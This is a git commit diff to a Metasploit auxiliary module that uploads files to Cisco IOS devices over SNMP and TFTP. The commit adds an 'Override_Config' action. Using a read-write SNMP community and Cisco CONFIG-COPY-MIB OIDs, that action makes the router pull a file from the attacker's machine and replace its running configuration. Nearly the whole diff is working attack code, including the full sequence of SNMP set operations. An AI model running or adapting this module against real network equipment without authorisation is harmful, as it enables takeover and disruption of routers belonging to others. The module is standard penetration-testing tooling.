modify cisco_upload_file to include actions
default action is Upload_File, which was the original function the new action Override_Config will override the running configmaster
parent
f34314547b
commit
403cf825a8
|
@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
'Name' => 'Cisco IOS SNMP File Upload (TFTP)',
|
||||
'Description' => %q{
|
||||
This module will copy file to a Cisco IOS device using SNMP and TFTP.
|
||||
The action override_config will override the running config of the Cisco device.
|
||||
The action Override_Config will override the running config of the Cisco device.
|
||||
A read-write SNMP community is required. The SNMP community scanner module can
|
||||
assist in identifying a read-write community. The target must
|
||||
be able to connect back to the Metasploit system and the use of
|
||||
|
@ -24,7 +24,37 @@ class MetasploitModule < Msf::Auxiliary
|
|||
'pello <fropert[at]packetfault.org>',
|
||||
'ct5595'
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
'License' => MSF_LICENSE,
|
||||
'Actions' =>
|
||||
[
|
||||
[
|
||||
'Upload_File',
|
||||
{
|
||||
'Description' => 'Upload the file',
|
||||
'ciscoFlashCopyCommand' => '1.3.6.1.4.1.9.9.10.1.2.1.1.2.',
|
||||
'ciscoFlashCopyProtocol' => '1.3.6.1.4.1.9.9.10.1.2.1.1.3.',
|
||||
'ciscoFlashCopyServerAddress' => '1.3.6.1.4.1.9.9.10.1.2.1.1.4.',
|
||||
'ciscoFlashCopySourceName' => '1.3.6.1.4.1.9.9.10.1.2.1.1.5.',
|
||||
'ciscoFlashCopyDestinationName' => '1.3.6.1.4.1.9.9.10.1.2.1.1.6.',
|
||||
'ciscoFlashCopyEntryStatus' => '1.3.6.1.4.1.9.9.10.1.2.1.1.11.'
|
||||
}
|
||||
],
|
||||
[
|
||||
'Override_Config',
|
||||
{
|
||||
'Description' => 'Override the running config',
|
||||
'ciscoFlashCopyEntryStatus' => '1.3.6.1.4.1.9.9.10.1.2.1.1.11.',
|
||||
'ciscoFlashCopyCommand' => '1.3.6.1.4.1.9.9.10.1.2.1.1.2.',
|
||||
'ccCopyProtocol' => '1.3.6.1.4.1.9.9.96.1.1.1.1.2.',
|
||||
'ccCopySourceFileType' => '1.3.6.1.4.1.9.9.96.1.1.1.1.3.',
|
||||
'ccCopyDestFileType' => '1.3.6.1.4.1.9.9.96.1.1.1.1.4.',
|
||||
'ccCopyServerAddress' => '1.3.6.1.4.1.9.9.96.1.1.1.1.5.',
|
||||
'ccCopyFileName' => '1.3.6.1.4.1.9.9.96.1.1.1.1.6.',
|
||||
'ccCopyEntryRowStatus' => '1.3.6.1.4.1.9.9.96.1.1.1.1.14.'
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultAction' => 'Upload_File'
|
||||
)
|
||||
register_options([
|
||||
OptPath.new('SOURCE', [true, "The filename to upload" ]),
|
||||
|
@ -80,44 +110,61 @@ class MetasploitModule < Msf::Auxiliary
|
|||
begin
|
||||
lhost = datastore['LHOST'] || Rex::Socket.source_address(ip)
|
||||
|
||||
ciscoFlashCopyCommand = "1.3.6.1.4.1.9.9.10.1.2.1.1.2."
|
||||
ciscoFlashCopyProtocol = "1.3.6.1.4.1.9.9.10.1.2.1.1.3."
|
||||
ciscoFlashCopyServerAddress = "1.3.6.1.4.1.9.9.10.1.2.1.1.4."
|
||||
ciscoFlashCopySourceName = "1.3.6.1.4.1.9.9.10.1.2.1.1.5."
|
||||
ciscoFlashCopyDestinationName = "1.3.6.1.4.1.9.9.10.1.2.1.1.6."
|
||||
ciscoFlashCopyEntryStatus = "1.3.6.1.4.1.9.9.10.1.2.1.1.11."
|
||||
|
||||
session = rand(255) + 1
|
||||
|
||||
snmp = connect_snmp
|
||||
|
||||
varbind = SNMP::VarBind.new("#{ciscoFlashCopyEntryStatus}#{session}" , SNMP::Integer.new(6))
|
||||
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyEntryStatus']}#{session}" , SNMP::Integer.new(6))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
varbind = SNMP::VarBind.new("#{ciscoFlashCopyEntryStatus}#{session}" , SNMP::Integer.new(5))
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyEntryStatus']}#{session}" , SNMP::Integer.new(5))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
varbind = SNMP::VarBind.new("#{ciscoFlashCopyCommand}#{session}" , SNMP::Integer.new(2))
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyCommand']}#{session}" , SNMP::Integer.new(2))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
|
||||
# If the above line didn't throw an error, the host is alive and the community is valid
|
||||
print_status("Copying file #{@filename} to #{ip}...")
|
||||
|
||||
varbind = SNMP::VarBind.new("#{ciscoFlashCopyProtocol}#{session}" , SNMP::Integer.new(1))
|
||||
if(action.name == 'Upload_File')
|
||||
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyProtocol']}#{session}" , SNMP::Integer.new(1))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
varbind = SNMP::VarBind.new("#{ciscoFlashCopyServerAddress}#{session}", SNMP::IpAddress.new(lhost))
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyServerAddress']}#{session}", SNMP::IpAddress.new(lhost))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
varbind = SNMP::VarBind.new("#{ciscoFlashCopySourceName}#{session}", SNMP::OctetString.new(@filename))
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopySourceName']}#{session}", SNMP::OctetString.new(@filename))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
varbind = SNMP::VarBind.new("#{ciscoFlashCopyDestinationName}#{session}", SNMP::OctetString.new(@filename))
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyDestinationName']}#{session}", SNMP::OctetString.new(@filename))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
varbind = SNMP::VarBind.new("#{ciscoFlashCopyEntryStatus}#{session}" , SNMP::Integer.new(1))
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyEntryStatus']}#{session}" , SNMP::Integer.new(1))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
elsif(action.name == 'Override_Config')
|
||||
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ccCopyProtocol']}#{session}" , SNMP::Integer.new(1))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ccCopySourceFileType']}#{session}" , SNMP::Integer.new(1))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ccCopyDestFileType']}#{session}" , SNMP::Integer.new(4))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ccCopyServerAddress']}#{session}", SNMP::IpAddress.new(lhost))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ccCopyFileName']}#{session}", SNMP::OctetString.new(@filename))
|
||||
value = snmp.set(varbind)
|
||||
|
||||
varbind = SNMP::VarBind.new("#{action.opts['ccCopyEntryRowStatus']}#{session}" , SNMP::Integer.new(1))
|
||||
value = snmp.set(varbind)
|
||||
end
|
||||
|
||||
|
||||
# No need to make noise about timeouts
|
||||
|
|
Loading…
Reference in New Issue